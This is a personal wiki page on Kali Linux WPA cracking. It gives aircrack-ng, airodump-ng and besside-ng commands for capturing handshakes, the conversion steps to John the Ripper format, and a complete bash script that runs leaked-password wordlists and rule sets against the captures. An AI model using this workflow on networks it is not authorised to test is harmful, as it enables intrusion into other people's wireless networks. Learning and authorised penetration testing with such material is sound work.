Kali/Wireless Reboot

From charlesreid1

Reboot

Revisiting some of the old techniques.

Classic WPA Cracking

Monitor wireless

First is aircrack to monitor wifi networks.

Start by putting the wifi card in monitor mode: 

$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up

Now you can use that interface to scan for wireless network activity: 

$ airodump-ng -i wlan1 -w output_file

This will output information about wireless network activity to a file.

Obtain handshakes

You can use aircrack to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.

Specify -W for wpa only, and specify your network interface: 

$ besside-ng -W wlan1

That will put handshakes in a cap file, and the name of networks whose handshakes were obtained in a log file.

Crack handshakes

Once we have the handshakes, use instructions on John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files. 

$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw

Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script: 

#!/bin/sh

# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"

cap="wpa.cap"

pwdir="/root/box/08_besside"

# Round 0
rulesets=("")

#### Round 1
###rulesets=("KoreLogicRulesAppendYears")

#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt

wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work

for pwfile in `/bin/ls -1 ${pwdir}/*.johnpw`;
do
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** **  * * * ** ****"
    echo "* ** * *** **** ***  * ** ** *** * * * *** *"
    echo "  * ***** *  * * * *** * * * * *  ***  * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""

    for rules in "${rulesets[@]}";
    do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . .  ."
        echo "... ... .. ...... . .. .  . .   ....  .... ."
        echo "... .  .. .  .  .  .. .... . .  . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset file ${rules}"
        echo ""

        for wordlist in "${wordlists[@]}";
        do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"

            if [ "${rules}" == "" ] ; then

                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"

                # actually do it
                mypwd=`pwd`
                cd ${johndir}
                ${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}
                cd ${mypwd}

            else
                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules}  ${pwfile}"

                # actually do it
                mypwd=`pwd`
                cd ${johndir}
                ${johnbin} --rules=${rules} --wordlist=${wordlist} --format=wpapsk  ${pwfile}
                cd ${mypwd}

            fi

        done
    done
done

Settle in, because we'll be here a while.

Alternatives to Cracking WPA

So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spending the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance you'll get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using?

Flags


Defcon.png
Kali Linux
"The quieter you become, the more you are able to hear."

Penetration testing Linux distribution.


Kali  · Category:Kali

Kali/Wireless Reboot


Kali Software:

Kali Tools

Kali Top 10

Aircrack  · Wireshark  · John the Ripper  · Nmap  · Metasploit Framework

Dsniff  · Tcpdump  · Hydra  · Sqlmap  · Burpsuite  · Commix

Dirbuster  · Valgrind


Attack Workflow:

Kali/Workflow

1 Physical Attacks: Kali/Layer 1 Attacks

2 Data/MAC Attacks: Kali/Layer 2 Attacks

3 Network Attacks: Kali/Layer 3 Attacks

4 Transport Attacks: Kali/Layer 4 Attacks

5 Session Attacks: Kali/Layer 5 Attacks

6 Presentation Attacks: Kali/Layer 6 Attacks

7 Application Attacks: Kali/Layer 7 Attacks


Red Team Blue Team

Metasploitable - Red Team

Metasploitable - Blue Team


Networking:

Kali/Hotspot  · Kali/OpenVPN  · Kali/OpenVPN/Hotspot  · Kali/OpenVPN/PIA

Kali/IPv6


Booting:

Kali/Dual Boot OS X  · Kali/Live USB  · Kali/Persistent USB


Installing:

Kali/Installing  · Kali/Post Install  · Kali/Fixes


Kali on Raspberry Pi:

Kali Raspberry Pi  · Kali Raspberry Pi/Installing  · Kali Raspberry Pi/Headless  · Kali Raspberry Pi/Post-Install


Category:Security  · Category:Wireless  · Category:Passwords  · Category:Man in the Middle  · Category:Evil Twin

Flags  · Template:KaliFlag  · e






Defcon.png
Wireless
all things wireless.

Wireless  · Category:Wireless


Software:

Scapy


Flags  · Template:WirelessFlag  · e





Defcon.png
aircrack-ng
a suite of tools for wireless cracking.


Aircrack  · Category:Aircrack


aircrack-ng

Many Ways to Crack a Wifi: Cracking Wifi

Aircrack Benchmarking: Aircrack/Benchmarking

WEP Attacks with Aircrack: Aircrack/WEP Cracking

WPA Attacks with Aircrack: Aircrack/WPA Cracking

Aircrack Hardware: Aircrack/Packet Injection Testing

Harvesting Wireless Network Information


airodump-ng

Basic Usage of Airodump


Category:Security  · Category:Wireless  · Category:Passwords


Flags  · Template:AircrackFlag  · e



Retrieved from "https://charlesreid1.com/w/index.php?title=Kali/Wireless_Reboot&oldid=12499"